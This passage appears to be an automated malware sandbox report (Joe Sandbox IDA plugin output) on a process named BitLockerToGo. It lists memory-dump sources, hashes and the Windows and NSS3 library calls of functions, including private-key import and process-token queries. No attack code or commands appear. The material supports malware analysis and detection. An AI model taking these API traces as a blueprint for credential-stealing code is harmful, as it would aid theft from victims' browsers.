                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FileOperation
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3080627654-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a992c0af55d60ef184cebaba549c22b6d5d478e218f39fcecb7af2b69a172c9e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 21e178f6d162df909f31a84aea1d8bb9fca59dd58029e1d043dc9ed8a77fbf88
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a992c0af55d60ef184cebaba549c22b6d5d478e218f39fcecb7af2b69a172c9e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E075B0D0421D9ECB41EFA899452EEFAF8BB08308F004569D115F2240E77446498FA5
                                                                                                                                                                                                                                                                                                                                                          Function 02A10AE2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A10AE9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10D50: __EH_prolog3_catch.LIBCMT ref: 02A10D57
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A10D50: std::_Xinvalid_argument.LIBCPMT ref: 02A10D7D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catch$Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3139515330-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: daa4b846ac8f22ceea0438809f8e44db27930a3918488e81de055e32ecaa32d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d24312f941a981069f29543ee6c445c6ae0c0431fc8f606c48d038b6284622b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daa4b846ac8f22ceea0438809f8e44db27930a3918488e81de055e32ecaa32d8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5D01732641208EBDF02EFA0C901B8D3B32AF14320F108104BA258F1E0CB329B60EF20
                                                                                                                                                                                                                                                                                                                                                          Function 02A13A7B Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f60ea44ca5c8f16690b2d00f66001fb673c95c1c3b21b27aa096b721d3eebf18
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 90135db22308fe714e35b11b9f743153758976d8bf7cee39a66a4bb47d3c5ca0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f60ea44ca5c8f16690b2d00f66001fb673c95c1c3b21b27aa096b721d3eebf18
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3E02336601B101B8B220E59C644567BB9ACFC197070D4195DE45C73C8CF33C80541D0
                                                                                                                                                                                                                                                                                                                                                          Function 02A08FEF Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 832269c35dc8ac9da3d890c1312c52740132b3f0f7b27d7250719f9059fa2870
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5217273347655f8cea09528ba50bff5f9006ef68b4a8aee77acc01d1faf07398
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 832269c35dc8ac9da3d890c1312c52740132b3f0f7b27d7250719f9059fa2870
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3E0EDB5A10108BFEF40DBA8DD45A9EBBF9EB44354F104065B905E3280EA70EA119A50

                                                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                          Function 6C6A4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C68601B,?,00000000,?), ref: 6C6A486F
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C6A48A8
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C6A48BE
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C6A48DE
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C6A48F5
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C6A490A
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C6A4919
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C6A493F
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4970
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C6A49A0
                                                                                                                                                                                                                                                                                                                                                          • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C6A49AD
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A49D4
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C6A49F4
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C6A4A10
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C6A4A27
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C6A4A3D
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C6A4A4F
                                                                                                                                                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(00000000,every), ref: 6C6A4A6C
                                                                                                                                                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C6A4A81
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4AAB
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C6A4ABE
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C6A4ADC
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4B17
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C6A4B33
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A413D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C6A4162
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A416B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: PL_strncasecmp.NSS3(2Bjl,?,00000001), ref: 6C6A4187
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: NSSUTIL_ArgSkipParameter.NSS3(2Bjl), ref: 6C6A41A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A41B4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C6A41CC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A4120: NSSUTIL_ArgFetchValue.NSS3(2Bjl,?), ref: 6C6A4203
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C6A4B53
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4B94
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A4BA7
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A4BB7
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6A4BC8
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3791087267-1256704202
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a4deba19014c782260ce67b717725d7c4e9a9591e26fc3897e6dd9a6b33ebe4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8b2e06e671dbd484800df9397b1a0df8a2acaf9d531f9bb237f03b3710043db3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a4deba19014c782260ce67b717725d7c4e9a9591e26fc3897e6dd9a6b33ebe4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61C10674E052559FEF108FE89C40BBE7BB8AF06308F141065EC55A7B01EBA1ED16C7A9
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A7C33
                                                                                                                                                                                                                                                                                                                                                          • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C6A7C66
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C6A7D1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: SECOID_FindOID_Util.NSS3(?,?,?,6C6A91C5), ref: 6C6A788F
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6A7D48
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C6A7D71
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C6A7DD3
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6A7DE1
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A7DF8
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C6A7E1A
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C6A7E58
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A91C5), ref: 6C6A78BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C6A91C5), ref: 6C6A78FA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C6A91C5), ref: 6C6A7930
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A91C5), ref: 6C6A7951
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6A7964
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6A797A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C6A7988
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C6A7998
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: free.MOZGLUE(00000000), ref: 6C6A79A7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C6A91C5), ref: 6C6A79BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C6A91C5), ref: 6C6A79CA
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6A7E49
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6A7F8C
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C6A7F98
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6A7FBF
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6A7FD9
                                                                                                                                                                                                                                                                                                                                                          • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C6A8038
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C6A8050
                                                                                                                                                                                                                                                                                                                                                          • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C6A8093
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3 ref: 6C6A7F29
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C648298,?,?,?,6C63FCE5,?), ref: 6C6A07BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6A07E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A081B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A0825
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C6A8072
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3 ref: 6C6A80F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ABC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C6A800A,00000000,?,00000000,?), ref: 6C6ABC3F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2815116071-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e411b6e5fd104b4ac84a1922a1a8ae49de7329b9313c70ea4b9c7cec3905e779
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fac4ee9ab45a6d9ad8db3afce295e6388645df912925f7f5d722949a5860aa28
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e411b6e5fd104b4ac84a1922a1a8ae49de7329b9313c70ea4b9c7cec3905e779
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64E1B4716083019FD700CF65C840B5BB7E5BF49308F14496DE89A9BB65E731EC16CB9A
                                                                                                                                                                                                                                                                                                                                                          Function 6C631C30 Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6C631C6B
                                                                                                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C631C75
                                                                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C631CA1
                                                                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 6C631CA9
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C631CB4
                                                                                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C631CCC
                                                                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C631CE4
                                                                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 6C631CEC
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C631CFD
                                                                                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C631D0F
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C631D17
                                                                                                                                                                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32 ref: 6C631D4D
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C631D73
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C631D7F
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C631D7A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
